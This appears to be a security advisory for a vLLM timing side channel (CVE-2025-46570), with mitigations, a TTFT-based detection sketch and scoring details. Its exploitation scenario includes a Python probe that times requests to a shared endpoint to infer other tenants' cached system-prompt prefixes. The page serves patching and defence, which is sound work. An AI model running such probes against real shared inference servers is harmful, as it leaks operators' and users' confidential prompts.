If you run vLLM in a multi-tenant environment, upgrade to 0.9.0 immediately: prefix caching under the PagedAttention mechanism creates measurable time-to-first-token (TTFT) differences that allow authenticated users to infer fragments of other tenants' prompts or system prompts. Single-tenant and isolated deployments carry negligible risk. The patch is available and straightforward; there is no justification for delay.
Risk Assessment
Low overall risk (CVSS 2.6), but contextually significant for multi-tenant LLM serving infrastructure. Exploitation requires network-level timing precision, an authenticated API account, and stable conditions to resolve sub-millisecond differences—making opportunistic attacks unlikely. The realistic threat model is a determined insider or co-tenant with sustained access probing a shared inference endpoint. Single-tenant private deployments behind a private network are not meaningfully affected.
Recommended Action
Five steps:
1. Upgrade vLLM to ≥0.9.0 (patch commit 77073c77).
2. Interim workaround: disable prefix caching (--disable-prefix-caching) at the cost of throughput degradation.
3. For multi-tenant deployments, enforce strict tenant isolation at the serving layer; running a separate vLLM instance per tenant eliminates the shared cache.
4. Restrict inference API access to authenticated, authorized clients only to reduce the attacker pool.
5. Monitor TTFT distributions per client for anomalous bimodal patterns that may indicate systematic timing probing (a detection sketch follows this list).
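For step 5, a minimal sketch of one way to flag a bimodal per-client TTFT distribution, assuming TTFT samples are already collected from serving-layer metrics; the function name, sample floor, and thresholds are illustrative assumptions, not tuned values:

```python
def looks_bimodal(ttfts: list[float], gap_ratio: float = 0.5) -> bool:
    """Crude two-cluster check: flag a client whose TTFT samples split into
    two well-populated clusters separated by one dominant gap -- the pattern
    a systematic cache-hit/cache-miss probe tends to produce.

    All thresholds here are illustrative assumptions, not tuned values.
    """
    if len(ttfts) < 50:
        return False  # too few samples to judge reliably
    xs = sorted(ttfts)
    spread = xs[-1] - xs[0]
    if spread == 0:
        return False
    # Find the single widest gap between adjacent sorted samples.
    widest, split = max((xs[i + 1] - xs[i], i) for i in range(len(xs) - 1))
    low, high = xs[: split + 1], xs[split + 1:]
    # Bimodal-ish: each cluster holds at least 20% of the samples and the
    # gap between them dominates the overall spread.
    return min(len(low), len(high)) >= 0.2 * len(xs) and widest / spread >= gap_ratio
```

In practice this would run per API key over a sliding window and feed an alert rather than a blocking action, since legitimate workloads mixing cached and uncached prompts can also produce two TTFT modes.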
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-46570?
CVE-2025-46570 is a timing side-channel vulnerability in vLLM versions prior to 0.9.0. When the PagedAttention mechanism finds a matching prefix chunk in the cache, prefill speeds up measurably, and the resulting TTFT differences let an authenticated user on a shared endpoint infer fragments of other tenants' prompts or system prompts. Multi-tenant deployments should upgrade to 0.9.0 immediately; single-tenant and isolated deployments carry negligible risk.
Is CVE-2025-46570 actively exploited?
No confirmed active exploitation of CVE-2025-46570 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-46570?
1. Upgrade vLLM to ≥0.9.0 (patch commit 77073c77).
2. Interim workaround: disable prefix caching (--disable-prefix-caching) at the cost of throughput degradation.
3. For multi-tenant deployments, enforce strict tenant isolation at the serving layer; running a separate vLLM instance per tenant eliminates the shared cache.
4. Restrict inference API access to authenticated, authorized clients only to reduce the attacker pool.
5. Monitor TTFT distributions per client for anomalous bimodal patterns that may indicate systematic timing probing.
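As a sketch of the interim workaround in step 2, prefix caching can also be turned off through vLLM's Python engine arguments; the model name below is an illustrative assumption, and the exact CLI flag spelling varies across vLLM versions, so check your version's --help:

```python
from vllm import LLM

# Sketch of the interim workaround: start the engine with prefix caching
# disabled, trading throughput for closing the timing channel.
llm = LLM(
    model="meta-llama/Llama-3.1-8B-Instruct",  # illustrative model choice
    enable_prefix_caching=False,
)
outputs = llm.generate("Hello")  # requests now always pay the full prefill cost
```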
What systems are affected by CVE-2025-46570?
This vulnerability affects the following AI/ML architecture patterns: Multi-tenant LLM inference serving, Shared inference infrastructure, API gateway with cached LLM backends, LLM-as-a-service platforms.
What is the CVSS score for CVE-2025-46570?
CVE-2025-46570 has a CVSS v3.1 base score of 2.6 (LOW). The EPSS exploitation probability is 0.18%.
Technical Details
NVD Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.
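As a conceptual model of why matching prefixes change TTFT (an illustration, not vLLM's actual implementation): prefix caching operates on fixed-size token blocks, and every leading block that matches an already-cached sequence skips prefill computation.

```python
BLOCK = 16  # illustrative block size in tokens, not vLLM's actual value

def matched_prefix_blocks(new_tokens: list[int], cached_tokens: list[int]) -> int:
    """Count how many leading fixed-size blocks of the new prompt exactly
    match the cached sequence; each match is prefill work skipped, which
    is what shows up as a lower TTFT."""
    n = 0
    while (n + 1) * BLOCK <= len(new_tokens):
        lo, hi = n * BLOCK, (n + 1) * BLOCK
        if new_tokens[lo:hi] != cached_tokens[lo:hi]:
            break
        n += 1
    return n
```

The more of a victim's prefix an attacker guesses correctly, the more blocks match and the faster the first token arrives.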
Exploitation Scenario
An adversary with a valid API account on a shared vLLM endpoint systematically submits prompts sharing prefixes with suspected system prompts or other users' conversation starters. Cache hit = fast TTFT, cache miss = slow TTFT. By performing a binary search over the prompt space across many requests, the attacker reconstructs cached prefix fragments character-by-character or token-by-token. The attack is noisy, requires stable network conditions to resolve timing differences reliably, and leaves a distinctive high-volume query pattern in access logs—but a patient attacker in a low-noise environment can extract meaningful fragments of proprietary or sensitive prompts.
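A minimal sketch of the probe described above, assuming an OpenAI-compatible streaming endpoint; the URL, credential, model name, candidate prefix, and the 0.8 hit threshold are all hypothetical illustrations:

```python
import statistics
import time

import requests  # third-party HTTP client

API_URL = "https://shared-llm.example.com/v1/completions"  # hypothetical endpoint
HEADERS = {"Authorization": "Bearer <attacker-api-key>"}   # hypothetical credential

def measure_ttft(prompt: str, samples: int = 20) -> float:
    """Median time-to-first-token over repeated streaming requests;
    the median damps network jitter."""
    timings = []
    for _ in range(samples):
        start = time.monotonic()
        with requests.post(
            API_URL, headers=HEADERS, stream=True, timeout=30,
            json={"model": "served-model", "prompt": prompt,
                  "max_tokens": 1, "stream": True},
        ) as resp:
            for line in resp.iter_lines():
                if line:  # first streamed chunk approximates TTFT
                    timings.append(time.monotonic() - start)
                    break
    return statistics.median(timings)

baseline = measure_ttft("random uncached filler text of comparable length")
probe = measure_ttft("You are a helpful assistant for ")  # guessed prefix
print(f"baseline={baseline:.4f}s probe={probe:.4f}s "
      f"likely_cache_hit={probe < 0.8 * baseline}")
```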
Weaknesses (CWE)
CWE-208: Observable Timing Discrepancy
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
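For readers checking the arithmetic, a worked derivation of the 2.6 base score from this vector, using the constant weights defined in the CVSS v3.1 specification:

```latex
\begin{aligned}
\text{Exploitability} &= 8.22 \times \underbrace{0.85}_{AV{:}N} \times \underbrace{0.44}_{AC{:}H} \times \underbrace{0.62}_{PR{:}L} \times \underbrace{0.62}_{UI{:}R} \approx 1.18 \\
\text{ISS} &= 1 - (1 - \underbrace{0.22}_{C{:}L})(1 - \underbrace{0}_{I{:}N})(1 - \underbrace{0}_{A{:}N}) = 0.22 \\
\text{Impact} &= 6.42 \times \text{ISS} \approx 1.41 \\
\text{BaseScore} &= \operatorname{roundup}\bigl(\min(\text{Impact} + \text{Exploitability},\ 10)\bigr) = \operatorname{roundup}(2.59) = 2.6
\end{aligned}
```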
References
- github.com/advisories/GHSA-4qjh-9fv9-r85r
- github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-53.yaml
- nvd.nist.gov/vuln/detail/CVE-2025-46570
- github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f (patch)
- github.com/vllm-project/vllm/pull/17045 (vendor pull request)
- github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r (vendor advisory)
Related Vulnerabilities
All of the following affect the same package (vllm):
- CVE-2024-9053 (CVSS 9.8): vllm: RCE via unsafe pickle deserialization in RPC server
- CVE-2026-25960 (CVSS 9.8): vllm: SSRF allows internal network access
- CVE-2025-47277 (CVSS 9.8): vLLM: RCE via exposed TCPStore in distributed inference
- CVE-2024-11041 (CVSS 9.8): vllm: RCE via unsafe pickle deserialization in MessageQueue
- CVE-2025-32444 (CVSS 9.8): vLLM: RCE via pickle deserialization on ZeroMQ